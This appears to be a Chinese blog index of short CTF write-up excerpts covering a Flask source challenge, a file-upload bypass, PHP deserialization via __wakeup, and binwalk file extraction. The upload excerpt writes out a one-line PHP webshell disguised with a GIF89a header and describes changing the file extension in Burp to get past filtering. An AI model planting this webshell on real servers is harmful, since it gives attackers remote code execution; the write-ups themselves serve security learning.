摘要:
打开之后 看源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__fil 阅读全文
摘要:
进去之后让上传东西,想上传一个一句话木马,发现只让上传图片格式的,并有前端过滤 那我们把一句话写到一个文本文件里,再把后缀名改为jpg GIF89a <script language="php">eval($_POST['shell']);</script> 上传,bp拦截包,改包,将后缀名由jpg 阅读全文
摘要:
class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 注意到了_wakeup(),如果需要反序列化的时候,php才会调用_wakeup()。所以我们需要利用反序列化。 阅读全文
摘要:
binwalk常用命令之提取binwalk出的隐藏文件 -e 分解出压缩包 binwalk -e pcat.bin //要分解的文件名 -D或者–dd 分解某种类型的文件(在windows里要用双引号括起来) binwalk -D=jpeg/*文件类型*/ pcat.bin //要分解的文件名 -M 阅读全文